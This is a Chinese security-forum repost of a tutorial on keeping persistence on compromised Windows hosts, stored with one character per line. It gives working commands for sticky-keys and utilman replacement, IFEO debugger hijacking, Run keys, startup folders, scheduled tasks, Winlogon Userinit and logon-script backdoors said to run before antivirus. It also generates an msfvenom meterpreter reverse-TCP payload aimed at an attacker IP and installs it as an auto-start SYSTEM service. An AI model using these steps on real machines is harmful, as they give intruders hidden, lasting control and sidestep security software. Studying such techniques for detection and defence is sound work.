论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[22102] 2021-06-25_原创Windows后渗透之权限维持
文档创建者:
s7ckTeam
浏览次数:
0
最后更新:
2025-01-18
渗透测试
0 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前在线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2021-06-25_原创Windows后渗透之权限维持
原
创
|
W
i
n
d
o
w
s
后
渗
透
之
权
限
维
持
L
e
m
o
n
S
e
c
2
0
2
1
-
0
6
-
2
5
转
自
S
e
c
I
N
技
术
平
台
辅
助
功
能
劫
持
辅
助
功
能
劫
持
W
i
n
d
o
w
s
1
0
有
一
些
辅
助
功
能
。
这
些
功
能
可
以
在
用
户
登
录
之
前
以
组
合
键
启
动
。
根
据
这
个
特
征
,
一
些
恶
意
软
件
无
需
登
录
到
系
统
,
通
过
远
程
桌
面
协
议
就
可
以
执
行
恶
意
代
码
。
一
些
常
见
的
辅
助
功
能
如
:
最
常
见
的
验
证
方
法
就
是
将
c
m
d
.
e
x
e
的
文
件
名
换
成
上
面
的
名
字
,
然
后
使
用
对
应
的
快
捷
键
就
可
以
调
出
c
m
d
窗
口
了
。
可
能
会
遇
到
的
问
题
:
我
在
实
现
这
个
操
作
的
时
候
会
遇
到
需
要
T
r
u
s
t
e
d
I
n
s
t
a
l
l
e
r
权
限
的
情
况
,
解
决
方
法
就
是
打
开
这
个
文
件
的
属
性
,
然
后
在
安
全
栏
目
里
点
击
高
级
,
然
后
再
点
击
更
改
,
再
点
击
一
次
高
级
,
进
入
之
后
点
击
立
即
查
找
,
双
击
你
有
权
限
操
作
的
用
户
就
可
以
了
。
C
:
W
i
n
d
o
w
s
S
y
s
t
e
m
3
2
s
e
t
h
c
.
e
x
e
粘
滞
键
快
捷
键
:
按
五
次
s
h
i
f
t
键
C
:
W
i
n
d
o
w
s
S
y
s
t
e
m
3
2
u
t
i
l
m
a
n
.
e
x
e
设
置
中
心
快
捷
键
:
W
i
n
d
o
w
s
+
U
键
C
:
W
i
n
d
o
w
s
S
y
s
t
e
m
3
2
M
a
g
n
i
f
y
.
e
x
e
放
大
镜
快
捷
键
:
W
i
n
d
o
w
s
+
加
减
号
镜
像
劫
持
镜
像
劫
持
所
谓
的
镜
像
劫
持
,
就
是
在
注
册
表
的
[
H
K
E
Y
_
L
O
C
A
L
_
M
A
C
H
I
N
E
S
O
F
T
W
A
R
E
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
N
T
C
u
r
r
e
n
t
V
e
r
s
i
o
n
I
m
a
g
e
F
i
l
e
E
x
e
c
u
t
i
o
n
O
p
t
i
o
n
s
]
处
新
建
一
个
以
杀
毒
软
件
主
程
序
命
名
的
项
(
也
可
以
是
自
启
动
程
序
命
名
的
项
)
,
例
如
R
a
v
.
e
x
e
。
然
后
再
创
建
一
个
子
键
“
D
e
b
u
g
g
e
r
=
"
C
:
1
.
b
a
t
”
(
里
面
可
以
写
命
令
,
这
里
也
可
以
是
一
些
可
执
行
程
序
的
路
径
)
。
当
我
们
双
击
打
开
那
个
程
序
时
,
就
会
运
行
D
e
b
u
g
g
e
r
路
径
的
程
序
。
原
理
原
理
当
我
们
双
击
运
行
程
序
时
,
系
统
会
查
询
该
I
F
E
O
注
册
表
,
如
果
发
现
存
在
和
该
程
序
名
称
完
全
相
同
的
子
键
,
就
查
询
对
应
子
健
中
包
含
的
“
d
u
b
u
g
g
e
r
”
键
值
名
。
如
果
该
参
数
不
为
空
,
系
统
则
会
把
D
e
b
u
g
g
e
r
参
数
里
指
定
的
程
序
文
件
名
作
为
用
户
试
图
启
动
的
程
序
执
行
请
求
来
处
理
。
这
样
成
功
执
行
的
是
遭
到
“
劫
持
”
的
虚
假
程
序
。
实
验
实
验
1
.
首
先
新
建
一
个
b
a
t
文
件
,
内
容
是
c
a
l
c
2
.
以
管
理
员
权
限
打
开
C
M
D
,
键
入
命
令
3
.
双
击
运
行
Q
Q
,
会
出
现
一
个
C
M
D
的
窗
口
一
闪
而
过
,
这
是
b
a
t
文
件
在
运
行
,
然
后
调
用
计
算
器
。
r
e
g
a
d
d
"
H
K
E
Y
_
L
O
C
A
L
_
M
A
C
H
I
N
E
S
O
F
T
W
A
R
E
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
N
T
C
u
r
r
e
n
t
V
e
r
s
i
o
n
I
m
a
g
e
F
i
l
e
E
x
e
c
u
t
i
o
n
O
p
t
i
o
n
s
Q
Q
.
E
X
E
"
/
v
d
e
b
u
g
g
e
r
/
t
R
E
G
_
S
Z
/
d
"
C
:
U
s
e
r
s
1
2
3
.
b
a
t
"
启
动
目
录
启
动
目
录
将
可
执
行
文
件
放
入
启
动
目
录
下
,
开
机
会
自
动
运
行
。
启
动
文
件
夹
路
径
:
隐
藏
文
件
相
关
键
值
相
关
键
值
启
动
时
注
册
表
后
门
启
动
时
注
册
表
后
门
启
动
项
键
值
路
径
首
先
在
1
2
3
.
b
a
t
文
件
中
敲
入
C
:
U
s
e
r
s
用
户
名
A
p
p
D
a
t
a
R
o
a
m
i
n
g
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
S
t
a
r
t
M
e
n
u
P
r
o
g
r
a
m
s
S
t
a
r
t
u
p
C
:
P
r
o
g
r
a
m
D
a
t
a
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
S
t
a
r
t
M
e
n
u
P
r
o
g
r
a
m
s
S
t
a
r
t
u
p
%
U
S
E
R
P
R
O
F
I
L
E
%
A
p
p
D
a
t
a
R
o
a
m
i
n
g
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
S
t
a
r
t
M
e
n
u
P
r
o
g
r
a
m
s
S
t
a
r
t
u
p
a
t
t
r
i
b
+
h
+
s
x
x
x
.
e
x
e
S
t
a
r
t
u
p
键
值
指
向
启
动
文
件
夹
H
K
E
Y
_
C
U
R
R
E
N
T
_
U
S
E
R
S
o
f
t
w
a
r
e
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
C
u
r
r
e
n
t
V
e
r
s
i
o
n
E
x
p
l
o
r
e
r
S
h
e
l
l
F
o
l
d
e
r
s
H
K
E
Y
_
L
O
C
A
L
_
M
A
C
H
I
N
E
S
O
F
T
W
A
R
E
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
C
u
r
r
e
n
t
V
e
r
s
i
o
n
E
x
p
l
o
r
e
r
S
h
e
l
l
F
o
l
d
e
r
s
H
K
E
Y
_
L
O
C
A
L
_
M
A
C
H
I
N
E
S
O
F
T
W
A
R
E
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
C
u
r
r
e
n
t
V
e
r
s
i
o
n
R
u
n
H
K
E
Y
_
L
O
C
A
L
_
M
A
C
H
I
N
E
S
O
F
T
W
A
R
E
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
C
u
r
r
e
n
t
V
e
r
s
i
o
n
R
u
n
O
n
c
e
c
a
l
c
,
然
后
将
路
径
添
加
到
注
册
表
键
值
中
注
销
后
重
新
登
录
,
成
功
打
开
计
算
器
最
后
附
赠
命
令
行
方
式
快
速
添
加
a
d
d
H
K
L
M
S
O
F
T
W
A
R
E
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
C
u
r
r
e
n
t
V
e
r
s
i
o
n
R
u
n
/
v
"
K
e
y
n
a
m
e
"
/
t
R
E
G
_
S
Z
/
d
"
C
:
1
2
3
.
b
a
t
"
/
f
启
动
时
服
务
后
门
启
动
时
服
务
后
门
W
i
n
d
o
w
s
的
服
务
程
序
通
常
默
默
的
运
行
在
后
台
,
且
拥
有
S
Y
S
T
E
M
权
限
,
非
常
适
合
用
于
后
门
持
久
化
。
我
们
可
以
将
E
X
E
/
D
L
L
等
可
执
行
文
件
注
册
为
服
务
实
现
后
门
持
久
化
。
首
先
在
K
A
L
I
生
成
后
门
,
再
将
后
门
上
传
到
被
控
主
机
上
打
开
被
控
制
的
主
机
输
入
p
o
w
e
r
s
h
e
l
l
创
建
服
务
c
a
l
c
r
e
g
m
s
f
v
e
n
o
m
-
p
w
i
n
d
o
w
s
/
x
6
4
/
m
e
t
e
r
p
r
e
t
e
r
/
r
e
v
e
r
s
e
_
t
c
p
L
H
O
S
T
=
1
9
2
.
1
6
8
.
1
.
1
3
8
L
P
O
R
T
=
5
5
5
5
-
f
e
x
e
>
/
t
m
p
/
p
e
n
t
e
s
t
l
a
b
.
e
x
e
s
c
c
r
e
a
t
e
p
e
n
t
e
s
t
l
a
b
b
i
n
p
a
t
h
=
"
c
m
d
/
k
C
:
u
s
e
r
s
t
e
s
t
p
e
n
t
e
s
t
l
a
b
.
e
x
e
"
s
t
a
r
t
=
"
a
u
t
o
"
o
b
j
=
"
L
o
c
a
l
S
y
s
t
e
m
"
s
c
s
t
a
r
t
p
e
n
t
e
s
t
N
e
w
-
S
e
r
v
i
c
e
-
N
a
m
e
"
p
e
n
t
e
s
t
l
a
b
"
-
B
i
n
a
r
y
P
a
t
h
N
a
m
e
"
C
:
u
s
e
r
s
t
e
s
t
p
e
n
t
e
s
t
l
a
b
.
e
x
e
"
-
D
e
s
c
r
i
p
t
i
o
n
"
P
e
n
t
e
s
t
L
a
b
o
r
a
t
o
r
i
e
s
"
-
S
t
a
r
t
u
p
T
y
p
e
A
u
t
o
m
a
t
i
c
s
c
s
t
a
r
t
p
e
n
t
e
s
t
l
a
b
系
统
计
划
任
务
后
门
系
统
计
划
任
务
后
门
W
i
n
d
o
w
s
实
现
定
时
任
务
主
要
有
s
c
h
t
a
s
k
s
与
a
t
二
种
方
式
,
通
过
计
划
任
务
A
t
适
用
于
w
i
n
d
o
w
s
x
p
/
2
0
0
3
,
S
c
h
t
a
s
k
s
适
用
于
w
i
n
7
/
2
0
0
8
+
用
管
理
员
权
限
打
开
命
令
行
:
s
c
h
t
a
s
k
s
/
c
r
e
a
t
e
/
s
c
o
n
l
o
g
o
n
/
t
n
c
a
l
c
/
t
r
c
:
1
2
3
.
b
a
t
注
销
重
新
登
录
W
i
n
l
o
g
o
n
用
户
登
陆
初
始
化
用
户
登
陆
初
始
化
W
i
n
l
o
g
o
n
.
e
x
e
进
程
是
W
i
n
d
o
w
s
操
作
系
统
中
非
常
重
要
的
一
部
分
,
W
i
n
l
o
g
o
n
用
于
执
行
与
W
i
n
d
o
w
s
登
录
过
程
相
关
的
各
种
关
键
任
务
。
在
注
册
表
路
径
的
U
s
e
r
i
n
i
t
项
指
向
u
s
e
r
i
n
i
t
.
e
x
e
,
是
用
户
登
录
时
执
行
的
用
户
初
始
化
程
序
。
可
以
在
后
面
加
上
可
执
行
程
序
的
绝
对
路
径
,
在
用
户
登
录
时
将
被
执
行
。
还
有
一
个
命
令
行
方
式
添
加
的
,
只
能
用
p
o
w
e
r
s
h
e
l
l
才
可
以
添
加
,
c
m
d
添
加
后
r
e
g
q
u
e
r
y
是
变
了
,
但
是
注
册
表
界
面
里
的
值
却
没
有
改
变
,
也
不
会
生
效
,
有
大
佬
知
道
的
麻
烦
教
教
我
。
s
c
s
t
a
r
t
p
e
n
t
e
s
t
l
a
b
H
K
E
Y
_
L
O
C
A
L
_
M
A
C
H
I
N
E
S
O
F
T
W
A
R
E
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
N
T
C
u
r
r
e
n
t
V
e
r
s
i
o
n
W
i
n
l
o
g
o
n
S
e
t
-
I
t
e
m
P
r
o
p
e
r
t
y
"
H
K
L
M
:
S
O
F
T
W
A
R
E
M
i
c
r
o
s
o
f
t
W
I
N
D
O
W
S
N
T
C
u
r
r
e
n
t
V
e
r
s
i
o
n
W
i
n
l
o
g
o
n
"
-
n
a
m
e
U
s
e
r
i
n
i
t
-
v
a
l
u
e
"
C
:
W
i
n
d
o
w
s
s
y
s
t
e
m
3
2
u
s
e
r
i
n
i
t
.
e
x
e
,
C
:
1
2
3
.
b
a
t
"
L
o
g
o
n
S
c
r
i
p
t
s
后
后
门
门
在
注
册
表
路
径
为
下
创
建
一
个
字
符
串
键
值
。
这
里
面
的
值
是
W
i
n
d
o
w
s
登
录
脚
本
,
当
用
户
登
录
时
触
发
,
L
o
g
o
n
S
c
r
i
p
t
s
能
够
优
先
于
杀
毒
软
件
执
行
,
绕
过
杀
毒
软
件
对
敏
感
操
作
的
拦
截
。
命
令
行
方
式
:
远
程
登
陆
实
现
多
人
登
陆
一
个
账
号
远
程
登
陆
实
现
多
人
登
陆
一
个
账
号
环
境
:
W
i
n
d
o
w
s
s
e
r
v
e
r
2
0
1
2
打
开
c
m
d
,
输
入
g
p
e
d
i
t
.
m
s
c
组
策
略
,
找
到
【
计
算
机
设
置
】
–
【
管
理
模
板
】
–
【
w
i
n
d
o
w
s
组
件
】
–
【
远
程
桌
面
服
务
】
–
【
远
程
桌
面
会
话
主
机
】
–
【
连
接
】
按
照
以
下
步
骤
操
作
:
1
、
拒
绝
将
已
经
登
录
到
控
制
台
会
话
的
管
理
员
注
销
—
选
择
启
用
2
、
限
制
连
接
的
数
量
—
选
择
启
用
,
配
置
‘
允
许
的
R
D
最
大
连
接
数
’
为
1
0
个
3
、
将
远
程
桌
面
服
务
用
户
限
制
到
单
独
的
远
程
桌
面
服
务
会
话
—
选
择
禁
用
g
p
u
p
d
a
t
e
/
f
o
r
c
e
命
令
到
管
理
员
命
令
提
示
符
窗
口
中
远
程
登
录
结
果
权
限
维
持
H
K
E
Y
_
C
U
R
R
E
N
T
_
U
S
E
R
E
n
v
i
r
o
n
m
e
n
t
U
s
e
r
I
n
i
t
M
p
r
L
o
g
o
n
S
c
r
i
p
t
r
e
g
a
d
d
"
H
K
C
U
E
n
v
i
r
o
n
m
e
n
t
"
/
v
"
U
s
e
r
I
n
i
t
M
p
r
L
o
g
o
n
S
c
r
i
p
t
"
/
t
R
E
G
_
S
Z
/
d
"
c
:
s
c
r
i
p
t
1
2
3
.
b
a
t
"
一
如
既
往
的
学
习
,
一
如
既
往
的
整
理
,
一
如
即
往
的
分
享
。
感
谢
支
持
“
如
侵
权
请
私
聊
公
众
号
删
文
”
关
注
关
注
L
e
m
o
n
S
e
c
觉
得
不
错
点
个
觉
得
不
错
点
个
“
赞
赞
”
、
、
“
在
看
在
看
”
哦
哦
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试